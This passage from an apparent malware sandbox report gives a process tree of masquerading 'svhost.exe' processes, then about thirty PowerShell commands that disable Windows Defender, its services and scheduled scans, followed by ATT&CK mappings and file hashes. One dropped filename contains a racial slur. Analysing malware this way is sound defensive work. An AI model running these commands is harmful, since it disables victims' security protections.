        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2520
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2852
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2264
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2592
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:988
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:2620
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3032
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2980
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2080
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2400
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2084
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1112
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1304
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:1796
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1812
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2732
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2388
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2772
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2908
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1856
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2620
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1528
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1864
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:276
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1840
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1040
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1192
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1852
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:892
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2548
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1960
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:348
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1432
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1532
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:916
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2164
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1136
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:832
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:3048
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1524
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:888
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:380
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2108
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2648
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1648
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1576
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1612
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:3008
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1000
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1156
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:956
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2872
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1320
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:1848
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1956
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2092
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1192
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:900
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2752
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:944
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2608
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2364
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:592
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:2932
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1760
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2512
    - - C:\Windows\SysWOW64\svhost.exe
        
        "C:\Windows\SysWOW64\svhost.exe"
        5⤵
        
        PID:3028
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      4⤵
      PID:1432
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:584
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:2836
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2288
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:692
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:2856
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:3048
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1812
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:3068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:1852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:2892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2900
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2800
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1600
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      4⤵
      PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\んｲゐﾘﾌﾚの乃ムりゐ刀ゐ刀ﾘり.bat" "
    3⤵
    PID:836
- C:\Users\Admin\AppData\Roaming\Koid (2).exe
  "C:\Users\Admin\AppData\Roaming\Koid (2).exe"
  2⤵
  - Executes dropped EXE
  PID:3008

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  2⤵
  - Adds Run key to start application
  PID:2428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Execution.vbs

Filesize
385B

MD5
29c1b5ad3de2dd6b6d01c836bfe09d8c

SHA1
679291ac88bfaab2c8b791d35405772338f1966d

SHA256
310c71edafe1d96379428ee100ab7555bdf21ba779b410097dacf7bc185ea74b

SHA512
d811a9b850c2e82d9e6ebf49a593b4d3d4362cac6b7c80a49b0e7f2ccb976f94554fb7b66dc5e36aa737b5712d506b25d0afbfa49c4d6748bebff4856f110dc8

Download Submit
C:\Users\Admin\AppData\Local\Execution2.vbs

Filesize
691B

MD5
efe4c1df8c085a4972c5f1050db7c57a

SHA1
d4f747e88c6dc9bf38d65089e19c75562a760a8c

SHA256
d7af053f7c26b035b9342cbf26c00c53550fc23f753e95dbd63fc6fa58cd29e8

SHA512
4e85937de682caee5ce744f8dc6a72e5a31181a2ee06501b87647ab0630887657bc67589b7ac52cdac6077424e64263ca26b3ba285eeac37c9ae3705789bea94

Download Submit
C:\Users\Admin\AppData\Local\Execution5.vbs

Filesize
433B

MD5
2ec46b5e67b42176014b60f459639f43

SHA1
b424c4ce02c9d531ea76bb8d155da74de09c0993

SHA256
6ecf9e983fa795056bf7fac460fd76c7d5e0b1bf25bea77bdc235e2ca27f0b6f

SHA512
31fe9cae4374b1562a8ae57d478aaa028dcdb07ce32eb8fd02a82b8a9a3479f336a89557baa4a348c6afc4db14a7a30dfe17497a7b3cabd10c6365db3197d393

Download Submit
C:\Users\Admin\AppData\Local\Temp\んｲゐﾘﾌﾚの乃ムりゐ刀ゐ刀ﾘり.bat

Filesize
597B

MD5
5e6247d586560ae514d73ec2301ade83

SHA1
fbce1e71ce20a757a8dd2f928775e5b87592c3df

SHA256
a7208a8399df7680fbc9da585ca797746ed3e32fd9199d81270c802a9e10a01c

SHA512
904134ef65503a250005220b98c9bafdfe8b3510399030c2727010a190cf643e0cc91c53cec0e3d4b05cf11745f8485c700af197bd98c59fd64b9a52f51fc87f

Download Submit
C:\Users\Admin\AppData\Roaming\Koid (2).exe

Filesize
1.7MB

MD5
937bd53a5f505b8e9b00416590ad8d92

SHA1
5abece11f9d282ec009bf441f132676344f1ede2

SHA256
662d56478c8fa24fb43b71cba64af8d941ddb90659c2412144b46137e2cc4c36

SHA512
2027fe14eff8cc0edd67be7f159e0710d79376aef11a70d4c0ad94d501667fd178780fb3a8f0c4481d2da32a3f6fd698e45cef297aee628cda1ae164e0434dd5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
67b501b77df75c53d47dd4048ccdf5bc

SHA1
a9f9b0412b230ed8ab66544b59bc68b079cc5961

SHA256
d3a90f457eaee803850ec7a6e4ab7f87875ff88eb38feca8fb09b4936005affc

SHA512
fdf07e0f2d536ce4fc8e64f9a3d905d8dd65a03a53474846ef62f5acde715149bac8a25085fdcb42fe3f06b01a4c04d2d63d74694ce0ed940840321215252176

Download Submit
\Users\Admin\AppData\Roaming\NiggerRiggerDiggerBigger.exe

Filesize
982KB

MD5
934ad078a1e54ccceef12cf193fd8447

SHA1
7145e2f95448a881ecc5643e0904c7b50854b931

SHA256
03d92a91a142665aa064846494c6e09596f7fa6bf176465bfef757e1a4091b61

SHA512
7682ef3d892f025cd8b5e898a7fb56d076f46c93aad02db5723746bc30e6849b799154d17bb5893d2539b33903f0597562712ddb317b251fcd31ffbbe3ef523d

Download Submit
memory/1972-26-0x0000000001060000-0x000000000115C000-memory.dmp

Filesize
1008KB

Download
memory/2132-0-0x0000000074031000-0x0000000074032000-memory.dmp

Filesize
4KB

Download
memory/2132-3-0x0000000074030000-0x00000000745DB000-memory.dmp

Filesize
5.7MB

Download
memory/2132-15-0x0000000074030000-0x00000000745DB000-memory.dmp

Filesize
5.7MB

Download
memory/2132-1-0x0000000074030000-0x00000000745DB000-memory.dmp

Filesize
5.7MB

Download
memory/2688-18-0x0000000071FE0000-0x00000000726CE000-memory.dmp

Filesize
6.9MB

Download
memory/2688-16-0x0000000071FEE000-0x0000000071FEF000-memory.dmp

Filesize
4KB

Download
memory/2688-17-0x0000000000210000-0x000000000030C000-memory.dmp

Filesize
1008KB

Download
memory/2688-67-0x0000000071FE0000-0x00000000726CE000-memory.dmp

Filesize
6.9MB

Download
memory/2900-58-0x0000000076B60000-0x0000000076C5A000-memory.dmp

Filesize
1000KB

Download
memory/2900-57-0x0000000076C60000-0x0000000076D7F000-memory.dmp

Filesize
1.1MB

Download